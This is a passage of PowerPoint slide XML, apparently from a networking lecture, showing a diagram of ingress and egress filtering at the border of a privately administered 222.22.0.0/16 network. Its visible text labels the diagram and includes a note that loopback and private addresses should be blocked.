          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10592" name="Rectangle 641"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2715" y="3379"/>
              <a:ext cx="18" cy="32"/>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593" name="Freeform 642"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2550" y="2912"/>
              <a:ext cx="278" cy="79"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 278"/>
                <a:gd name="T1" fmla="*/ 0 h 79"/>
                <a:gd name="T2" fmla="*/ 119 w 278"/>
                <a:gd name="T3" fmla="*/ 6 h 79"/>
                <a:gd name="T4" fmla="*/ 278 w 278"/>
                <a:gd name="T5" fmla="*/ 75 h 79"/>
                <a:gd name="T6" fmla="*/ 168 w 278"/>
                <a:gd name="T7" fmla="*/ 79 h 79"/>
                <a:gd name="T8" fmla="*/ 0 w 278"/>
                <a:gd name="T9" fmla="*/ 0 h 79"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 278"/>
                <a:gd name="T16" fmla="*/ 0 h 79"/>
                <a:gd name="T17" fmla="*/ 278 w 278"/>
                <a:gd name="T18" fmla="*/ 79 h 79"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="278" h="79">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="119" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278" y="75"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168" y="79"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10594" name="Freeform 643"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2719" y="2985"/>
              <a:ext cx="108" cy="59"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 108"/>
                <a:gd name="T1" fmla="*/ 1 h 59"/>
                <a:gd name="T2" fmla="*/ 108 w 108"/>
                <a:gd name="T3" fmla="*/ 0 h 59"/>
                <a:gd name="T4" fmla="*/ 108 w 108"/>
                <a:gd name="T5" fmla="*/ 59 h 59"/>
                <a:gd name="T6" fmla="*/ 0 w 108"/>
                <a:gd name="T7" fmla="*/ 59 h 59"/>
                <a:gd name="T8" fmla="*/ 1 w 108"/>
                <a:gd name="T9" fmla="*/ 1 h 59"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 108"/>
                <a:gd name="T16" fmla="*/ 0 h 59"/>
                <a:gd name="T17" fmla="*/ 108 w 108"/>
                <a:gd name="T18" fmla="*/ 59 h 59"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="108" h="59">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="108" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E0E0E0"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10595" name="Freeform 644"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2551" y="2912"/>
              <a:ext cx="172" cy="131"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 172"/>
                <a:gd name="T1" fmla="*/ 0 h 131"/>
                <a:gd name="T2" fmla="*/ 0 w 172"/>
                <a:gd name="T3" fmla="*/ 45 h 131"/>
                <a:gd name="T4" fmla="*/ 172 w 172"/>
                <a:gd name="T5" fmla="*/ 131 h 131"/>
                <a:gd name="T6" fmla="*/ 172 w 172"/>
                <a:gd name="T7" fmla="*/ 73 h 131"/>
                <a:gd name="T8" fmla="*/ 0 w 172"/>
                <a:gd name="T9" fmla="*/ 0 h 131"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 172"/>
                <a:gd name="T16" fmla="*/ 0 h 131"/>
                <a:gd name="T17" fmla="*/ 172 w 172"/>
                <a:gd name="T18" fmla="*/ 131 h 131"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="172" h="131">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="45"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="A0A0A0"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10454" name="Text Box 646"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7694691" y="4883150"/>
            <a:ext cx="1316038" cy="492125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10455" name="Text Box 647"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1833562" y="4924425"/>
            <a:ext cx="3427413" cy="493713"/>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privately administered</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10456" name="Line 648"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5299075" y="5181600"/>
            <a:ext cx="1096962" cy="15875"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10457" name="Line 649"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1319212" y="5181600"/>
            <a:ext cx="509588" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10458" name="Line 650"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1336675" y="4935538"/>
            <a:ext cx="0" cy="474662"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10459" name="Line 651"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6442075" y="4968875"/>
            <a:ext cx="0" cy="458788"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10460" name="Line 652"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6457950" y="5181278"/>
            <a:ext cx="1165226" cy="11435"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10461" name="Line 653"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9626600" y="4953000"/>
            <a:ext cx="0" cy="422275"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10462" name="Line 654"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9012238" y="5162550"/>
            <a:ext cx="598487" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10463" name="Text Box 655"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200823" y="7637463"/>
            <a:ext cx="2385589" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>222.22.0.0/16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10464" name="Group 656"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5078412" y="6054725"/>
            <a:ext cx="2289175" cy="738188"/>
            <a:chOff x="1955" y="2193"/>
            <a:chExt cx="1014" cy="327"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10483" name="Text Box 657"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1955" y="2246"/>
              <a:ext cx="699" cy="198"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2300">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>127.32.1.1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10484" name="Line 658"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2654" y="2351"/>
              <a:ext cx="156" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10485" name="Text Box 659"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2762" y="2193"/>
              <a:ext cx="207" cy="327"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>x</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10465" name="Group 660"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7783512" y="7199313"/>
            <a:ext cx="811213" cy="406400"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10468" name="Group 661"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10470" name="Oval 662"/>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latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10471" name="Line 663"/>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0472" name="Line 664"/>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0473" name="Rectangle 665"/>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Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10474" name="Oval 666"/>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latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10475" name="Group 667"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10480" name="Line 668"/>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0481" name="Line 66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0482" name="Line 670"/>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0476" name="Group 671"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10477" name="Line 67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0478" name="Line 67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0479" name="Line 67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0469" name="Line 675"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="10466" name="Line 676"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7513637" y="7370763"/>
            <a:ext cx="333375" cy="19050"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8813800"/>
            <a:ext cx="13004800" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Lookback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/private addresses should be blocked locally, if not, then on the network </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5752066" y="2293508"/>
            <a:ext cx="821058" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Egress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Filtering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="679" name="Rectangle 678"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7402778" y="6169428"/>
            <a:ext cx="821058" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ingress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Filtering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10065395" y="2686883"/>
            <a:ext cx="2813754" cy="5078314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>egress filtering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> is the practice of monitoring and potentially restricting the flow of information outbound from one network to another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="252525"/>
